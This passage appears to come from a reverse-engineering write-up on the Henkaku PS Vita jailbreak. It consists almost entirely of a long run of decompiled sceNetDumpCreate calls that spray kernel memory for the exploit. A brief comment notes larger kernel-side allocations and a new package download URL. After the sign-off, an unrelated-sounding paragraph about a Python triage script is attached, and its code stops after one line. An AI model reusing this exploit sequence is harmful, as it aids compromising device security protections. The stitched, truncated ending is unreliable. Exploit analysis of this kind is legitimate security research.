sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4300, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2400, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0500, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AED00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE600, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC700, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA800, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8900, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6A00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4B00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2C00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0D00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000);

// Old code ...


This suggests more memory is now allocated for the kernel side of the exploit. The encrypted/obfuscated chunk was modified and a new string was added: "http://go.henkaku.xyz/pkg"


To be continued...

~ H.
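A small triage aid for reading decompiled call logs like the one above, added here as an example and not part of H.'s write-up or the Henkaku code: it parses the `sceNetDumpCreate(x_stack + ..., size, flags)` calls and collapses them into runs of constant stride, so the shape of the allocation sweep (first value, last value, step, number of calls) can be read off instead of counted by hand. The embedded log is a constructed excerpt in the same format, not the full sequence from the page.

```python
import re
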